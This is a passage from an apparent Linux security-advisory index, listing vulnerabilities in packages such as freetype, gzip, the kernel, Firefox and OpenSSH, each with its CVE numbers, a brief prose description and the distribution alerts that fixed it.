Mandriva MDKSA-2006:073 2006-04-24
Ubuntu USN-272-1 2006-04-24
Gentoo 200604-09 2006-04-21

Comments (none posted)

ffmpeg: buffer overflows

Package(s):ffmpeg CVE #(s):CVE-2006-4799 CVE-2006-4800
Created:September 14, 2006 Updated:May 28, 2007
Description: the AVI processing code in FFmpeg has a number of buffer overflow vulnerabilities. If an attacker can trick a user into loading a specially crafted crafted AVI, arbitrary code can be executed with the user's privileges.
Alerts:
Gentoo 200609-09 2006-09-13

Comments (2 posted)

freeradius: several vulnerabilities

Package(s):freeradius CVE #(s):CVE-2005-4745 CVE-2005-4746
Created:August 8, 2006 Updated:April 24, 2007
Description: Several remote vulnerabilities have been discovered in freeradius, a high-performance RADIUS server, which may lead to SQL injection or denial of service.
Alerts:
Mandriva MDKSA-2007:092 2007-04-23
Debian DSA-1145-1 2006-08-08

Comments (none posted)

freetype: integer overflows

Package(s):freetype CVE #(s):CVE-2006-0747 CVE-2006-1861 CVE-2006-2493 CVE-2006-2661 CVE-2006-3467
Created:June 8, 2006 Updated:June 1, 2010
Description: The FreeType library has several integer overflow vulnerabilities. If a user can be tricked into installing a specially crafted font file, arbitrary code can be executed with the privilege of the user.
Alerts:
Gentoo 201006-01 2010-06-01
Fedora FEDORA-2009-5644 2009-05-28
Fedora FEDORA-2009-5558 2009-05-28
CentOS CESA-2009:0329 2009-05-22
Red Hat RHSA-2009:1062-01 2009-05-22
Red Hat RHSA-2009:0329-02 2009-05-22
Gentoo 200710-09 2007-10-09
Debian DSA-1178-1 2006-09-16
Ubuntu USN-341-1 2006-09-06
Gentoo 200609-04 2006-09-06
rPath rPSA-2006-0157-1 2006-08-25
Mandriva MDKSA-2006:148 2006-08-24
Red Hat RHSA-2006:0635-01 2006-08-21
Red Hat RHSA-2006:0634-01 2006-08-21
Fedora FEDORA-2006-912 2006-08-14
SuSE SUSE-SA:2006:045 2006-08-01
OpenPKG OpenPKG-SA-2006.017 2006-07-28
Ubuntu USN-324-1 2006-07-27
Slackware SSA:2006-207-02 2006-07-27
Mandriva MDKSA-2006:129 2006-07-20
Gentoo 200607-02 2006-07-09
SuSE SUSE-SA:2006:037 2006-06-27
Mandriva MDKSA-2006:099-1 2006-06-13
Mandriva MDKSA-2006:099 2006-06-12
rPath rPSA-2006-0100-1 2006-06-12
Debian DSA-1095-1 2006-06-10
Ubuntu USN-291-1 2006-06-08

Comments (none posted)

gcc: file overwrite vulnerability

Package(s):gcc CVE #(s):CVE-2006-3619
Created:September 6, 2006 Updated:March 14, 2008
Description: The fastjar utility found in the GNU compiler collection does not perform adequate file path checking, allowing the creation or overwriting of files outside of the current directory tree.
Alerts:
Mandriva MDVSA-2008:066 2007-03-13
Red Hat RHSA-2007:0473-01 2007-06-11
Red Hat RHSA-2007:0220-02 2007-05-01
Debian DSA-1170-1 2006-09-06

Comments (none posted)

gdb: buffer overflow

Package(s):gdb CVE #(s):CVE-2006-4146
Created:September 15, 2006 Updated:June 12, 2007
Description: A buffer overflow in dwarfread.c and dwarf2read.c debugging code in GNU Debugger (GDB) 6.5 allows user-assisted attackers, or restricted users, to execute arbitrary code via a crafted file with a location block (DW_FORM_block) that contains a large number of operations.
Alerts:
Red Hat RHSA-2007:0469-01 2007-06-11
Red Hat RHSA-2007:0229-02 2007-05-01
Ubuntu USN-356-1 2006-10-02
Fedora FEDORA-2006-975 2006-09-14

Comments (none posted)

gdm: improper file permissions

Package(s):gdm CVE #(s):CVE-2006-1057
Created:April 19, 2006 Updated:May 2, 2007
Description: The .ICEauthority file may be created with the wrong ownership and permissions; gdm 2.14.2 fixes the problem.
Alerts:
Red Hat RHSA-2007:0286-02 2007-05-01
Mandriva MDKSA-2006:083 2006-05-09
Ubuntu USN-278-1 2006-05-03
Debian DSA-1040-1 2006-04-24
Fedora FEDORA-2006-338 2006-04-19

Comments (none posted)

gedit: format string vulnerability

Package(s):gedit CVE #(s):CAN-2005-1686
Created:June 9, 2005 Updated:February 5, 2009
Description: A format string vulnerability has been discovered in gedit. Calling the program with specially crafted file names caused a buffer overflow, which could be exploited to execute arbitrary code with the privileges of the gedit user.
Alerts:
Fedora FEDORA-2009-1189 2009-01-29
Fedora FEDORA-2009-1187 2009-01-29
Debian DSA-753-1 2005-07-12
Mandriva MDKSA-2005:102 2005-06-15
Red Hat RHSA-2005:499-01 2005-06-13
Gentoo 200506-09 2005-06-11
Ubuntu USN-138-1 2005-06-09

Comments (1 posted)

grip: buffer overflow

Package(s):grip CVE #(s):CAN-2005-0706
Created:March 10, 2005 Updated:November 19, 2008
Description: Grip, a CD ripper, has a buffer overflow vulnerability that can occur when the CDDB server returns more than 16 matches.
Alerts:
Fedora FEDORA-2008-9604 2008-11-19
Fedora FEDORA-2008-9521 2008-11-19
Fedora-Legacy FLSA:152919 2005-09-15
Mandriva MDKSA-2005:074 2005-04-20
Mandriva MDKSA-2005:075 2005-04-20
Gentoo 200504-07 2005-04-08
Mandrake MDKSA-2005:066 2005-04-01
Red Hat RHSA-2005:304-01 2005-03-28
Gentoo 200503-21 2005-03-17
Fedora FEDORA-2005-203 2005-03-09
Fedora FEDORA-2005-202 2005-03-09

Comments (none posted)

gzip: multiple vulnerabilities

Package(s):gzip CVE #(s):CVE-2006-4334 CVE-2006-4335 CVE-2006-4336 CVE-2006-4337 CVE-2006-4338
Created:September 19, 2006 Updated:January 20, 2010
Description: Tavis Ormandy of the Google Security Team discovered two denial of service flaws in the way gzip expanded archive files. If a victim expanded a specially crafted archive, it could cause the gzip executable to hang or crash.

Tavis Ormandy of the Google Security Team discovered several code execution flaws in the way gzip expanded archive files. If a victim expanded a specially crafted archive, it could cause the gzip executable to crash or execute arbitrary code.

Alerts:
Debian DSA-1974-1 2010-01-20
Fedora FEDORA-2007-557 2007-05-31
Gentoo 200611-24 2006-11-28
Fedora-Legacy FLSA:211760 2006-11-13
Fedora FEDORA-2006-989 2006-10-10
SuSE SUSE-SA:2006:056 2006-09-26
Gentoo 200609-13 2006-09-23
Trustix TSLSA-2006-0052 2006-09-22
Mandriva MDKSA-2006:167 2006-09-20
Slackware SSA:2006-262-01 2006-09-20
OpenPKG OpenPKG-SA-2006.020 2006-09-20
Debian DSA-1181-1 2006-09-19
rPath rPSA-2006-0170-1 2006-09-19
Ubuntu USN-349-1 2006-09-19
Red Hat RHSA-2006:0667-01 2006-09-19

Comments (1 posted)

gzip: arbitrary command execution

Package(s):gzip CVE #(s):CAN-2005-0758
Created:August 1, 2005 Updated:January 10, 2007
Description: zgrep in gzip before 1.3.5 does not handle shell metacharacters like '|' and '&' properly when they occurred in input file names. This could be exploited to execute arbitrary commands with user privileges if zgrep is run in an untrusted directory with specially crafted file names.
Alerts:
OpenPKG OpenPKG-SA-2007.002 2007-01-08
Mandriva MDKSA-2006:027 2006-01-30
Mandriva MDKSA-2006:026 2006-01-30
Fedora-Legacy FLSA:158801 2005-11-14
Fedora-Legacy FLSA:157696 2005-08-10
Ubuntu USN-161-1 2005-08-04
Ubuntu USN-158-1 2005-08-01

Comments (2 posted)

ImageMagick: buffer overflows

Package(s):ImageMagick CVE #(s):CVE-2006-5456
Created:October 31, 2006 Updated:March 8, 2007
Description: Multiple buffer overflows in GraphicsMagick before 1.1.7 and ImageMagick 6.0.7 allow user-assisted attackers to cause a denial of service and possibly execute execute arbitrary code via (1) a DCM image that is not properly handled by the ReadDCMImage function in coders/dcm.c, or (2) a PALM image that is not properly handled by the ReadPALMImage function in coders/palm.c.
Alerts:
Slackware SSA:2007-066-06 2007-03-08
rPath rPSA-2007-0029-1 2007-02-08
rPath rPSA-2006-0218-1 2006-11-27
Gentoo 200611-19 2006-11-24
Fedora FEDORA-2006-1285 2006-11-22
Fedora FEDORA-2006-1286 2006-11-22
Debian DSA-1213-1 2006-11-19
SuSE SUSE-SA:2006:066 2006-11-14
Gentoo 200611-07 2006-11-13
Ubuntu USN-372-1 2006-11-01
Mandriva MDKSA-2006:193 2006-10-30

Comments (2 posted)

kdelibs: integer overflow

Package(s):kdelibs CVE #(s):CVE-2006-4811
Created:October 18, 2006 Updated:March 5, 2007
Description: The KDE khtml library can pass untrusted parameters into Qt, allowing a hostile user to trigger an integer overflow there and execute arbitrary code.
Alerts:
Gentoo 200703-06 2007-03-04
Gentoo 200611-02 2006-11-06
Red Hat RHSA-2006:0725-01 2006-11-01
Debian DSA-1200-1 2006-10-30
Slackware SSA:2006-298-01 2006-10-26
rPath rPSA-2006-0195-2 2006-10-18
Mandriva MDKSA-2006:186 2006-10-19
rPath rPSA-2006-0195-1 2006-10-18
Red Hat RHSA-2006:0720-01 2006-10-18

Comments (none posted)

kdelibs: kate backup file permission leak

Package(s):kdelibs kate kwrite CVE #(s):CAN-2005-1920
Created:July 19, 2005 Updated:September 21, 2010
Description: Kate / Kwrite, as shipped with KDE 3.2.x up to including 3.4.0, creates a file backup before saving a modified file. These backup files are created with default permissions, even if the original file had more strict permissions set. See this advisory for more information.
Alerts:
Gentoo 200611-21 2006-11-27
Debian DSA-804-2 2005-11-10
Debian DSA-804-1 2005-09-08
Red Hat RHSA-2005:612-01 2005-07-27
Ubuntu USN-150-1 2005-07-21
Mandriva MDKSA-2005:122 2005-07-20
Fedora FEDORA-2005-594 2005-07-19

Comments (1 posted)

kernel: denial of service

Package(s):kernel CVE #(s):CVE-2006-4623
Created:October 18, 2006 Updated:November 14, 2007
Description: The kernel DVB layer can be caused to crash with maliciously-formatted unidirectional lightweight encapsulation (ULE) data.
Alerts:
Ubuntu USN-489-1 2007-07-19
rPath rPSA-2006-0194-1 2006-10-17

Comments (none posted)

kernel: denial of service

Package(s):kernel CVE #(s):CVE-2006-4535 CVE-2006-4538
Created:September 18, 2006 Updated:January 5, 2009
Description: Sridhar Samudrala discovered a local denial of service vulnerability in the handling of SCTP sockets. By opening such a socket with a special SO_LINGER value, a local attacker could exploit this to crash the kernel. (CVE-2006-4535)

Kirill Korotaev discovered that the ELF loader on the ia64 and sparc platforms did not sufficiently verify the memory layout. By attempting to execute a specially crafted executable, a local user could exploit this to crash the kernel. (CVE-2006-4538)

Alerts:
Red Hat RHSA-2008:0787-01 2009-01-05
Red Hat RHSA-2007:1049-01 2007-12-03
Mandriva MDKSA-2006:182 2006-10-11
Red Hat RHSA-2006:0689-01 2006-10-05
Debian DSA-1184-2 2006-09-26
Debian DSA-1184-1 2006-09-25
Debian DSA-1183-1 2006-09-25
Ubuntu USN-347-1 2006-09-18

Comments (none posted)

kernel: denial of service by memory consumption

Package(s):kernel CVE #(s):CVE-2006-2936
Created:July 17, 2006 Updated:November 14, 2007
Description: The ftdi_sio driver (usb/serial/ftdi_sio.c) in Linux kernel 2.6.x up to 2.6.17, and possibly later versions, allows local users to cause a denial of service (memory consumption) by writing more data to the serial port than the driver can handle, which causes the data to be queued.
Alerts:
SuSE SUSE-SA:2007:035 2007-06-14
Mandriva MDKSA-2006:151 2006-08-25
Mandriva MDKSA-2006:150 2006-08-25
Ubuntu USN-331-1 2006-08-03
rPath rPSA-2006-0130-1 2006-07-17

Comments (none posted)

kernel: denial of service

Package(s):kernel CVE #(s):CVE-2006-2935 CVE-2006-4145 CVE-2006-3745
Created:September 1, 2006 Updated:July 30, 2008
Description: Previous versions of the kernel package are subject to several vulnerabilities. Certain malformed UDF filesystems can cause the system to crash (denial of service). Malformed CDROM firmware or USB storage devices (such as USB keys) could cause system crash (denial of service), and if they were intentionally malformed, can cause arbitrary code to run with elevated privileges. In addition, the SCTP protocol is subject to a remote system crash (denial of service) attack.
Alerts:
Red Hat RHSA-2008:0665-01 2008-07-24
SuSE SUSE-SA:2007:053 2007-10-12
SuSE SUSE-SA:2006:064 2006-11-10
Red Hat RHSA-2006:0710-01 2006-10-19
SuSE SUSE-SA:2006:057 2006-09-28
Trustix TSLSA-2006-0051 2006-09-15
Ubuntu USN-346-2 2006-09-14
Ubuntu USN-346-1 2006-09-14
rPath rPSA-2006-0162-1 2006-08-31

Comments (none posted)

krb5: local privilege escalation

Package(s):krb5 CVE #(s):CVE-2006-3083
Created:August 9, 2006 Updated:July 7, 2010
Description: Some kerberos applications fail to check the results of setuid() calls, with the result that, if that call fails, they could continue to execute as root after thinking they had switched to a nonprivileged user. A local attacker who can cause these calls to fail (through resource exhaustion, presumably) could exploit this bug to gain root privileges.
Alerts:
Mandriva MDVSA-2010:129 2010-07-07
SuSE SUSE-SR:2006:022 2006-09-08
Gentoo 200608-21 2006-08-23
Ubuntu USN-334-1 2006-08-16
Fedora FEDORA-2006-905 2006-08-09
Mandriva MDKSA-2006:139 2006-09-09
Gentoo 200608-15 2006-08-10
rPath rPSA-2006-0150-1 2006-08-09
Red Hat RHSA-2006:0612-01 2006-08-08
Debian DSA-1146-1 2006-08-09

Comments (none posted)

libgadu: memory alignment bug

Package(s):libgadu CVE #(s):CAN-2005-2370
Created:July 29, 2005 Updated:June 25, 2007
Description: Szymon Zygmunt and Michal Bartoszkiewicz discovered a memory alignment error in libgadu (from ekg, console Gadu Gadu client, an instant messaging program) which is included in gaim, a multi-protocol instant messaging client, as well. This can not be exploited on the x86 architecture but on others, e.g. on Sparc and lead to a bus error, in other words a denial of service.
Alerts:
Debian DSA-813-1 2005-09-15
Red Hat RHSA-2005:627-01 2005-08-09
Debian DSA-769-1 2005-07-29

Comments (none posted)

libgd2: denial of service

Package(s):libgd2 CVE #(s):CVE-2006-2906
Created:June 14, 2006 Updated:January 16, 2007
Description: Certain GIF images can cause libgd2 to go into an infinite loop, adversely affecting the performance of image processing applications.
Alerts:
rPath rPSA-2007-0008-1 2007-01-15
Debian DSA-1117-1 2006-07-21
Mandriva MDKSA-2006:113 2006-06-27
Mandriva MDKSA-2006:112 2006-06-27
Ubuntu USN-298-1 2006-06-13

Comments (none posted)

libmms: buffer overflows

Package(s):libmms CVE #(s):CVE-2006-2200
Created:July 6, 2006 Updated:December 25, 2006
Description: Several buffer overflows were found in libmms. By tricking a user into opening a specially crafted remote multimedia stream with an application using libmms, a remote attacker could overwrite an arbitrary memory portion with zeros, thereby crashing the program.
Alerts:
Slackware SSA:2006-357-05 2006-12-25
Gentoo 200607-07 2006-07-20
Mandriva MDKSA-2006:121 2006-07-12
Mandriva MDKSA-2006:117-1 2006-07-12
Ubuntu USN-315-1 2006-07-12
Mandriva MDKSA-2006:117 2006-07-06
Ubuntu USN-309-1 2006-07-05

Comments (none posted)

libpng: buffer overflow

Package(s):libpng CVE #(s):CVE-2006-3334
Created:July 19, 2006 Updated:December 15, 2008
Description: In pngrutil.c, the function png_decompress_chunk() allocates insufficient space for an error message, potentially overwriting stack data, leading to a buffer overflow.
Alerts:
Gentoo 200812-15 2008-12-14
Mandriva MDKSA-2006:213 2006-11-16
rPath rPSA-2006-0133-1 2006-07-19
Gentoo 200607-06 2006-07-19

Comments (none posted)

libpng: heap based buffer overflow

Package(s):libpng CVE #(s):CVE-2006-0481
Created:February 13, 2006 Updated:December 15, 2008
Description: A heap based buffer overflow bug was found in the way libpng strips alpha channels from a PNG image. An attacker could create a carefully crafted PNG image file in such a way that it could cause an application linked with libpng to crash or execute arbitrary code when the file is opened by a victim.
Alerts:
Gentoo 200812-15 2008-12-14
Red Hat RHSA-2006:0205-01 2006-02-13

Comments (1 posted)

libtiff: buffer overflow

Package(s):libtiff CVE #(s):CVE-2006-2193
Created:June 15, 2006 Updated:September 1, 2008
Description: The t2p_write_pdf_string function in libtiff 3.8.2 and earlier is vulnerable to a buffer overflow. Attackers can use a TIFF file with UTF-8 characters in the DocumentName tag to overflow a buffer, causing a denial of service, and possibly the execution of arbitrary code.
Alerts:
CentOS CESA-2008:0848 2008-08-30
Red Hat RHSA-2008:0848-01 2008-08-28
Fedora FEDORA-2006-952 2006-09-05
SuSE SUSE-SA:2006:044 2006-08-01
Gentoo 200607-03 2006-07-09
SuSE SUSE-SR:2006:014 2006-06-20
Trustix TSLSA-2006-0036 2006-06-16
Mandriva MDKSA-2006:102 2006-06-14

Comments (none posted)

libvncserver: authentication bypass

Package(s):libvncserver CVE #(s):CVE-2006-2450
Created:August 4, 2006 Updated:March 19, 2007
Description: LibVNCServer fails to properly validate protocol types effectively letting users decide what protocol to use, such as "Type 1 - None". LibVNCServer will accept this security type, even if it is not offered by the server.
Alerts:
Gentoo 200703-19 2007-03-18
Gentoo 200608-12 2006-08-07
Gentoo 200608-05 2006-08-04

Comments (none posted)

libwmf: integer overflow

Package(s):libwmf CVE #(s):CVE-2006-3376
Created:July 13, 2006 Updated:November 6, 2006
Description: libwmf, a library that is used for processing Windows MetaFile vector graphics files, has an integer overflow vulnerability.
Alerts:
OpenPKG OpenPKG-SA-2006.031 2006-11-06
Debian DSA-1194-1 2006-10-09
Gentoo 200608-17 2006-08-10
Ubuntu USN-333-1 2006-08-09
Mandriva MDKSA-2006:132 2006-07-28
Fedora FEDORA-2006-831 2006-07-18
Fedora FEDORA-2006-832 2006-07-18
Fedora FEDORA-2006-805 2006-07-12
Fedora FEDORA-2006-804 2006-07-12

Comments (none posted)

libxml2 - arbitrary code execution

Package(s):libxml2 CVE #(s):CAN-2004-0110
Created:February 26, 2004 Updated:August 19, 2009
Description: Yuuichi Teranishi discovered a flaw in libxml2 versions prior to 2.6.6. When fetching a remote resource via FTP or HTTP, libxml2 uses special parsing routines. These routines can overflow a buffer if passed a very long URL. If an attacker is able to find an application using libxml2 that parses remote resources and allows them to influence the URL, then this flaw could be used to execute arbitrary code.
Alerts:
Fedora FEDORA-2009-8594 2009-08-15
Fedora FEDORA-2009-8582 2009-08-15
Fedora-Legacy FLSA:1324 2004-07-19
Conectiva CLA-2004:836 2004-03-31
Gentoo 200403-01 2004-03-06
Trustix TSLSA-2004-0010 2004-03-05
OpenPKG OpenPKG-SA-2004.003 2004-03-05
Netwosix NW-2004-0004 2004-03-04
Debian DSA-455-1 2004-03-03
Mandrake MDKSA-2004:018 2004-03-03
Red Hat RHSA-2004:091-02 2004-03-03
Whitebox WBSA-2004:090-01 2004-03-01
Red Hat RHSA-2004:090-01 2004-02-26
Fedora FEDORA-2004-087 2004-02-25
Red Hat RHSA-2004:091-01 2004-02-26

Comments (none posted)

libxml2: multiple buffer overflows

Package(s):libxml2 CVE #(s):CAN-2004-0989
Created:October 28, 2004 Updated:August 19, 2009
Description: libxml2 prior to version 2.6.14 has multiple buffer overflow vulnerabilities, if a local user passes a specially crafted FTP URL, arbitrary code may be executed.
Alerts:
Fedora FEDORA-2009-8594 2009-08-15
Fedora FEDORA-2009-8582 2009-08-15
Ubuntu USN-89-1 2005-02-28
Red Hat RHSA-2004:650-01 2004-12-16
Conectiva CLA-2004:890 2004-11-18
Red Hat RHSA-2004:615-01 2004-11-12
Mandrake MDKSA-2004:127 2004-11-04
Debian DSA-582-1 2004-11-02
Gentoo 200411-05 2004-11-02
Trustix TSLSA-2004-0055 2004-10-29
OpenPKG OpenPKG-SA-2004.050 2004-10-31
Ubuntu USN-10-1 2004-10-28
Fedora FEDORA-2004-353 2004-10-28

Comments (none posted)

linux-restricted-modules: nVidia driver vulnerability

Package(s):linux-restricted-modules CVE #(s):CVE-2006-5379
Created:November 6, 2006 Updated:January 11, 2007
Description: Derek Abdine discovered that the NVIDIA Xorg driver did not correctly verify the size of buffers used to render text glyphs. When displaying very long strings of text, the Xorg server would crash. If a user were tricked into viewing a specially crafted series of glyphs, this flaw could be exploited to run arbitrary code with root privileges.
Alerts:
Mandriva MDKSA-2007:007 2007-01-10
Gentoo 200611-03 2006-11-07
Ubuntu USN-377-1 2006-11-03

Comments (none posted)

lynx: arbitrary command execution

Package(s):lynx CVE #(s):CVE-2005-2929
Created:November 14, 2005 Updated:September 14, 2009
Description: An arbitrary command execute bug was found in the lynx "lynxcgi:" URI handler. An attacker could create a web page redirecting to a malicious URL which could execute arbitrary code as the user running lynx.
Alerts:
Gentoo 200909-15 2009-09-12
Fedora-Legacy FLSA:152832 2005-12-17
OpenPKG OpenPKG-SA-2005.026 2005-12-03
Fedora FEDORA-2005-1079 2005-11-14
Fedora FEDORA-2005-1078 2005-11-14
Gentoo 200511-09 2005-11-13
Mandriva MDKSA-2005:211 2005-11-12
Red Hat RHSA-2005:839-01 2005-11-11

Comments (none posted)

mono: symlink vulnerability

Package(s):mono CVE #(s):CVE-2006-5072
Created:October 4, 2006 Updated:December 1, 2006
Description: The mono System.CodeDom.Compiler classes suffer from a temporary file symlink vulnerability which could be used to overwrite files, or, in this case, even inject arbitrary code into a running mono application.
Alerts:
SuSE SUSE-SA:2006:073 2006-12-01
Gentoo 200611-23 2006-11-28
Mandriva MDKSA-2006:188 2006-10-27
Fedora FEDORA-2006-1012 2006-10-06
Ubuntu USN-357-1 2006-10-04

Comments (none posted)

firefox: multiple vulnerabilities

Package(s):mozilla firefox thunderbird CVE #(s):CVE-2006-4565 CVE-2006-4566 CVE-2006-4571 CVE-2006-4253 CVE-2006-4567 CVE-2006-4568 CVE-2006-4569
Created:September 15, 2006 Updated:November 14, 2006
Description: Two flaws were found in the way Firefox/Thunderbird processed certain regular expressions. A malicious web page/HTML email could crash the browser or possibly execute arbitrary code as the user running Firefox/Thunderbird. (CVE-2006-4565, CVE-2006-4566)

A number of flaws were found in Firefox/Thunderbird. A malicious web page/HTML email could crash the browser or possibly execute arbitrary code as the user running Firefox/Thunderbird. (CVE-2006-4571)

A flaw was found in the handling of JavaScript timed events. A malicious web page could crash the browser or possibly execute arbitrary code as the user running Firefox/Thunderbird. (CVE-2006-4253)

A flaw was found in the Firefox/Thunderbird auto-update verification system. An attacker who has the ability to spoof a victim's DNS could get Firefox to download and install malicious code. In order to exploit this issue an attacker would also need to get a victim to previously accept an unverifiable certificate. (CVE-2006-4567)

Firefox did not properly prevent a frame in one domain from injecting content into a sub-frame that belongs to another domain, which facilitates website spoofing and other attacks (CVE-2006-4568)

Firefox did not load manually opened, blocked popups in the right domain context, which could lead to cross-site scripting attacks. In order to exploit this issue an attacker would need to find a site which would frame their malicious page and convince the user to manually open a blocked popup. (CVE-2006-4569)

Alerts:
Debian DSA-1210-1 2006-11-14
Gentoo 200610-04 2006-10-16
Ubuntu USN-361-1 2006-10-10
Debian DSA-1192-1 2006-10-06
Gentoo 200610-01 2006-10-04
Debian DSA-1191-1 2006-10-05
Ubuntu USN-354-1 2006-10-02
Gentoo 200609-19 2006-09-28
Mandriva MDKSA-2006:169 2006-09-22
Ubuntu USN-352-1 2006-09-25
Ubuntu USN-351-1 2006-09-22
SuSE SUSE-SA:2006:054 2006-09-22
Ubuntu USN-350-1 2006-09-21
Mandriva MDKSA-2006:168 2006-09-20
Red Hat RHSA-2006:0677-01 2006-09-15
Red Hat RHSA-2006:0676-01 2006-09-15
Red Hat RHSA-2006:0675-01 2006-09-15
rPath rPSA-2006-0169-1 2006-09-15
Slackware SSA:2006-257-03 2006-09-15
Fedora FEDORA-2006-977 2006-09-14
Fedora FEDORA-2006-976 2006-09-14

Comments (none posted)

mutt: race conditions

Package(s):mutt CVE #(s):CVE-2006-5297 CVE-2006-5298
Created:October 30, 2006 Updated:November 1, 2006
Description: A race condition in the safe_open function in the Mutt mail client 1.5.12 and earlier, when creating temporary files in an NFS filesystem, allows local users to overwrite arbitrary files due to limitations of the use of the O_EXCL flag on NFS filesystems. (CVE-2006-5297)

The mutt_adv_mktemp function in the Mutt mail client 1.5.12 and earlier does not properly verify that temporary files have been created with restricted permissions, which might allow local users to create files with weak permissions via a race condition between the mktemp and safe_fopen function calls. (CVE-2006-5298)

Alerts:
Ubuntu USN-373-1 2006-11-01
Mandriva MDKSA-2006:190 2006-10-27

Comments (none posted)

mysql: format string bug

Package(s):mysql CVE #(s):CVE-2006-3469
Created:July 21, 2006 Updated:July 30, 2008
Description: Jean-David Maillefer discovered a format string bug in the date_format() function's error reporting. By calling the function with invalid arguments, an authenticated user could exploit this to crash the server.
Alerts:
Red Hat RHSA-2008:0768-01 2008-07-24
Slackware SSA:2006-211-01 2006-07-31
Ubuntu USN-321-1 2006-07-21

Comments (none posted)

MySQL: privilege violations

Package(s):mysql CVE #(s):CVE-2006-4031 CVE-2006-4226
Created:August 25, 2006 Updated:July 30, 2008
Description: MySQL 4.1 before 4.1.21 and 5.0 before 5.0.24 allows a local user to access a table through a previously created MERGE table, even after the user's privileges are revoked for the original table, which might violate intended security policy (CVE-2006-4031).

MySQL 4.1 before 4.1.21, 5.0 before 5.0.25, and 5.1 before 5.1.12, when run on case-sensitive filesystems, allows remote authenticated users to create or access a database when the database name differs only in case from a database for which they have permissions (CVE-2006-4226).

Alerts:
Red Hat RHSA-2008:0768-01 2008-07-24
Red Hat RHSA-2008:0364-01 2008-05-21
Red Hat RHSA-2007:0152-01 2007-04-03
Red Hat RHSA-2007:0083-01 2007-02-19
Fedora FEDORA-2006-1298 2006-11-27
Fedora FEDORA-2006-1297 2006-11-27
Ubuntu USN-338-1 2006-09-05
Mandriva MDKSA-2006:149 2006-08-24

Comments (none posted)

MySQL: logging bypass

Package(s):mysql CVE #(s):CVE-2006-0903
Created:April 4, 2006 Updated:May 21, 2008
Description: MySQL 5.0.18 and earlier allows local users to bypass logging mechanisms via SQL queries that contain the NULL character, which are not properly handled by the mysql_real_query function. NOTE: this issue was originally reported for the mysql_query function, but the vendor states that since mysql_query expects a null character, this is not an issue for mysql_query.
Alerts:
Red Hat RHSA-2008:0364-01 2008-05-21
Ubuntu USN-274-2 2006-05-15
Ubuntu USN-274-1 2006-04-27
Mandriva MDKSA-2006:064 2006-04-03

Comments (2 posted)

nbd: arbitrary code execution

Package(s):nbd CVE #(s):CVE-2005-3534
Created:January 6, 2006 Updated:March 7, 2011
Description: Kurt Fitzner discovered that the NBD (network block device) server did not correctly verify the maximum size of request packets. By sending specially crafted large request packets, a remote attacker who is allowed to access the server could exploit this to execute arbitrary code with root privileges.
Alerts:
SuSE SUSE-SR:2006:001 2006-01-13
Ubuntu USN-237-1 2006-01-06

Comments (none posted)

ncompress: buffer underflow

Package(s):ncompress CVE #(s):CVE-2006-1168
Created:August 10, 2006 Updated:February 21, 2012
Description: The ncompress compression utility has a missing boundary check. A local user can use a maliciously created file to cause a a .bss buffer underflow.
Alerts:
Gentoo 200610-03 2006-10-06
Red Hat RHSA-2006:0663-01 2006-09-12
Mandriva MDKSA-2006:140 2006-08-09
Debian DSA-1149-1 2006-08-10
Red Hat RHSA-2012:0308-03 2012-02-21
Scientific Linux SL-busy-20120321 2012-03-21
Red Hat RHSA-2012:0810-04 2012-06-20
Scientific Linux SL-busy-20120709 2012-07-09
Mageia MGASA-2012-0171 2012-07-19
Mandriva MDVSA-2012:129 2012-08-10
Mandriva MDVSA-2012:129-1 2012-08-10

Comments (none posted)

openldap: security bypass

Package(s):openldap CVE #(s):CVE-2006-4600
Created:September 29, 2006 Updated:June 12, 2007
Description: slapd in OpenLDAP before 2.3.25 allows remote authenticated users with selfwrite Access Control List (ACL) privileges to modify arbitrary Distinguished Names (DN).
Alerts:
Red Hat RHSA-2007:0430-01 2007-06-11
Red Hat RHSA-2007:0310-02 2007-05-01
Trustix TSLSA-2006-0055 2006-10-06
rPath rPSA-2006-0176-1 2006-09-29
Mandriva MDKSA-2006:171 2006-09-28

Comments (none posted)

openoffice.org: several vulnerabilities

Package(s):openoffice.org CVE #(s):CVE-2006-2198 CVE-2006-2199 CVE-2006-3117
Created:June 30, 2006 Updated:January 4, 2007
Description: Several vulnerabilities have been discovered in OpenOffice.org, a free office suite.
  • It turned out to be possible to embed arbitrary BASIC macros in documents in a way that OpenOffice.org does not see them but executes them anyway without any user interaction. (CVE-2006-2198)
  • It is possible to evade the Java sandbox with specially crafted Java applets. (CVE-2006-2199)
  • Loading malformed XML documents can cause buffer overflows and cause a denial of service or execute arbitrary code. (CVE-2006-3117)
Alerts:
Fedora FEDORA-2007-005 2007-01-03
rPath rPSA-2006-0173-1 2006-09-26
Gentoo 200607-12 2006-07-28
Ubuntu USN-313-2 2006-07-19
Ubuntu USN-313-1 2006-07-11
Mandriva MDKSA-2006:118 2006-07-07
Debian DSA-1104-2 2006-07-06
Red Hat RHSA-2006:0573-01 2006-07-03
SuSE SUSE-SA:2006:040 2006-07-03
Fedora FEDORA-2006-770 2006-07-03
Fedora FEDORA-2006-764 2006-06-30
Debian DSA-1104-1 2006-06-30

Comments (none posted)

OpenSSH: denial of service

Package(s):openssh CVE #(s):CVE-2006-4925 CVE-2006-5052
Created:October 6, 2006 Updated:November 15, 2007
Description: packet.c in ssh in OpenSSH allows remote attackers to cause a denial of service (crash) by sending an invalid protocol sequence with USERAUTH_SUCCESS before NEWKEYS, which causes newkeys[mode] to be NULL.

An unspecified vulnerability in portable OpenSSH before 4.4, when running on some platforms, allows remote attackers to determine the validity of usernames via unknown vectors involving a GSSAPI "authentication abort."

Alerts:
Red Hat RHSA-2007:0703-02 2007-11-15
Red Hat RHSA-2007:0540-04 2007-11-07
Fedora FEDORA-2007-394 2007-04-03
Gentoo 200611-06 2006-11-13
SuSE SUSE-SA:2006:062 2006-10-20
rPath rPSA-2006-0185-1 2006-10-05

Comments (none posted)

openssh: remote denial of service

Package(s):openssh CVE #(s):CVE-2006-4924 CVE-2006-5051
Created:September 27, 2006 Updated:September 17, 2008
Description: Openssh 4.4 fixes some security issues, including a pre-authentication denial of service, an unsafe signal hander and on portable OpenSSH a GSSAPI authentication abort could be used to determine the validity of usernames on some platforms.
Alerts:
Debian DSA-1638-1 2008-09-16
Debian DSA-1212-1 2006-11-15
Fedora FEDORA-2006-1011 2006-10-03
Debian DSA-1189-1 2006-10-04
Mandriva MDKSA-2006:179 2006-10-03
Ubuntu USN-355-1 2006-10-02
OpenPKG OpenPKG-SA-2006.022 2006-10-01
Slackware SSA:2006-272-02 2006-09-29
Red Hat RHSA-2006:0698-01 2006-09-28
Red Hat RHSA-2006:0697-01 2006-09-28
